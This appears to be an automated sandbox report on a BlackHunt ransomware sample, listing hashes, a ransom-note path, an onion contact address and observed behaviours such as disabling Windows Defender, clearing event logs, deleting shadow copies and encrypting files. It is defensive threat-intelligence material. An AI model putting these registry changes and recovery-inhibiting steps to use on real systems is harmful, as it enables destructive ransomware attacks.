Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
18-01-2024 23:08
Static task
static1
Behavioral task
behavioral1
Sample
3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe
Resource
win10v2004-20231222-en
General
-
Target
3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe
-
Size
707KB
-
MD5
e03374a5848dddee90e26158afcb89b6
-
SHA1
530e00226265656c42b4dad18ac3c9796cf3ac25
-
SHA256
3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e
-
SHA512
6b0cbf30b52a6ab16d4a4317946332a04a4b97d7e95628e32db4ce41418ba01fbae32360c90f3569b84976473902f86aa70aa721448decf90c71985657ca8ae5
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1F8kvnh:6uaTmkZJ+naie5OTamgEoKxLWQah
Malware Config
Extracted
C:\Program Files\7-Zip\Lang\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1760 fsutil.exe 3440 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 4728 wevtutil.exe 5016 wevtutil.exe 4708 wevtutil.exe 5088 wevtutil.exe 5028 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2960 bcdedit.exe 3068 bcdedit.exe 3368 bcdedit.exe 1544 bcdedit.exe -
Renames multiple (2875) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2100 wbadmin.exe 3236 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 3612 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\S: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\Z: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\E: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\I: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\G: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\M: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\W: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\R: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\U: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\P: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\Y: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\V: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\J: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\Q: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\T: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\O: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\L: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\N: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\A: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\H: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\K: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\X: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\B: 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened (read-only) \??\F: vssadmin.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_zh_4.4.0.v20140623020002.jar 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-favorites.xml 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-outline.xml 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\VideoLAN\VLC\locale\am\#BlackHunt_Private.key 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#BlackHunt_ReadMe.hta 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\#BlackHunt_ReadMe.hta 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\#BlackHunt_Private.key 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\VideoLAN\VLC\locale\az\#BlackHunt_Private.key 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\cursors.properties 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-spi-actions.jar 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#BlackHunt_ReadMe.hta 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\CET 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\#BlackHunt_ReadMe.hta 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDXFile_8.ico 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\7-Zip\Lang\gl.txt 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup-impl.jar 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.zh_CN_5.5.0.165303.jar 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\#BlackHunt_Private.key 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\#BlackHunt_ReadMe.txt 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Hermosillo 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.zh_CN_5.5.0.165303.jar 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\Java\jre7\lib\applet\#BlackHunt_ReadMe.txt 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\VideoLAN\VLC\locale\km\#BlackHunt_Private.key 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunec.jar 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\colorcycle.png 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CST6CDT 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_zh_CN.jar 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\VideoLAN\VLC\plugins\mux\#BlackHunt_Private.key 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvSOFT.x3d 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Fortaleza 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\#BlackHunt_ReadMe.hta 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\#BlackHunt_Private.key 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#BlackHunt_ReadMe.txt 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#BlackHunt_ReadMe.hta 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\#BlackHunt_ReadMe.txt 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\VideoLAN\VLC\plugins\control\#BlackHunt_ReadMe.hta 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\#BlackHunt_ReadMe.txt 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fiji 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#BlackHunt_Private.key 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\#BlackHunt_ReadMe.txt 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\#BlackHunt_Private.key 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.events_3.0.0.draft20060413_v201105210656.jar 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\#BlackHunt_ReadMe.txt 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Kerguelen 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Urumqi 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\#BlackHunt_ReadMe.hta 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.contexts_1.3.100.v20140407-1019.jar 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_filter\#BlackHunt_ReadMe.hta 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Campo_Grande 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\resources.jar 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\#BlackHunt_ReadMe.hta 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\Java\jdk1.7.0_80\#BlackHunt_Private.key 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Berlin 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-uihandler.xml_hidden 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.log 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\#BlackHunt_Private.key 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2128 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2140 vssadmin.exe 1680 vssadmin.exe 1532 vssadmin.exe 1840 vssadmin.exe 2912 vssadmin.exe 2968 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 3776 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3412 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1320 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe Token: SeRestorePrivilege 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe Token: SeBackupPrivilege 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe Token: SeTakeOwnershipPrivilege 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe Token: SeAuditPrivilege 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe Token: SeSecurityPrivilege 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe Token: SeIncBasePriorityPrivilege 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe Token: SeBackupPrivilege 2624 vssvc.exe Token: SeRestorePrivilege 2624 vssvc.exe Token: SeAuditPrivilege 2624 vssvc.exe Token: SeBackupPrivilege 2848 wbengine.exe Token: SeRestorePrivilege 2848 wbengine.exe Token: SeSecurityPrivilege 2848 wbengine.exe Token: SeSecurityPrivilege 4728 wevtutil.exe Token: SeBackupPrivilege 4728 wevtutil.exe Token: SeSecurityPrivilege 5016 wevtutil.exe Token: SeBackupPrivilege 5016 wevtutil.exe Token: SeSecurityPrivilege 4708 wevtutil.exe Token: SeBackupPrivilege 4708 wevtutil.exe Token: SeSecurityPrivilege 5088 wevtutil.exe Token: SeBackupPrivilege 5088 wevtutil.exe Token: SeSecurityPrivilege 5028 wevtutil.exe Token: SeBackupPrivilege 5028 wevtutil.exe Token: SeDebugPrivilege 3776 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1740 wrote to memory of 1124 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 29 PID 1740 wrote to memory of 1124 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 29 PID 1740 wrote to memory of 1124 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 29 PID 1740 wrote to memory of 1124 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 29 PID 1740 wrote to memory of 2424 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 31 PID 1740 wrote to memory of 2424 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 31 PID 1740 wrote to memory of 2424 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 31 PID 1740 wrote to memory of 2424 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 31 PID 1124 wrote to memory of 2644 1124 cmd.exe 33 PID 1124 wrote to memory of 2644 1124 cmd.exe 33 PID 1124 wrote to memory of 2644 1124 cmd.exe 33 PID 1740 wrote to memory of 1468 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 34 PID 1740 wrote to memory of 1468 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 34 PID 1740 wrote to memory of 1468 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 34 PID 1740 wrote to memory of 1468 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 34 PID 2424 wrote to memory of 2168 2424 cmd.exe 36 PID 2424 wrote to memory of 2168 2424 cmd.exe 36 PID 2424 wrote to memory of 2168 2424 cmd.exe 36 PID 1740 wrote to memory of 2100 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 143 PID 1740 wrote to memory of 2100 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 143 PID 1740 wrote to memory of 2100 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 143 PID 1740 wrote to memory of 2100 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 143 PID 1740 wrote to memory of 2600 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 38 PID 1740 wrote to memory of 2600 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 38 PID 1740 wrote to memory of 2600 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 38 PID 1740 wrote to memory of 2600 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 38 PID 1740 wrote to memory of 2668 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 41 PID 1740 wrote to memory of 2668 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 41 PID 1740 wrote to memory of 2668 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 41 PID 1740 wrote to memory of 2668 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 41 PID 1468 wrote to memory of 2672 1468 cmd.exe 42 PID 1468 wrote to memory of 2672 1468 cmd.exe 42 PID 1468 wrote to memory of 2672 1468 cmd.exe 42 PID 1740 wrote to memory of 2680 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 43 PID 1740 wrote to memory of 2680 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 43 PID 1740 wrote to memory of 2680 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 43 PID 1740 wrote to memory of 2680 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 43 PID 1740 wrote to memory of 2656 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 44 PID 1740 wrote to memory of 2656 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 44 PID 1740 wrote to memory of 2656 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 44 PID 1740 wrote to memory of 2656 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 44 PID 1740 wrote to memory of 2080 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 46 PID 1740 wrote to memory of 2080 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 46 PID 1740 wrote to memory of 2080 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 46 PID 1740 wrote to memory of 2080 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 46 PID 1740 wrote to memory of 2620 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 48 PID 1740 wrote to memory of 2620 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 48 PID 1740 wrote to memory of 2620 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 48 PID 1740 wrote to memory of 2620 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 48 PID 2100 wrote to memory of 2488 2100 wbadmin.exe 51 PID 2100 wrote to memory of 2488 2100 wbadmin.exe 51 PID 2100 wrote to memory of 2488 2100 wbadmin.exe 51 PID 1740 wrote to memory of 2736 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 53 PID 1740 wrote to memory of 2736 1740 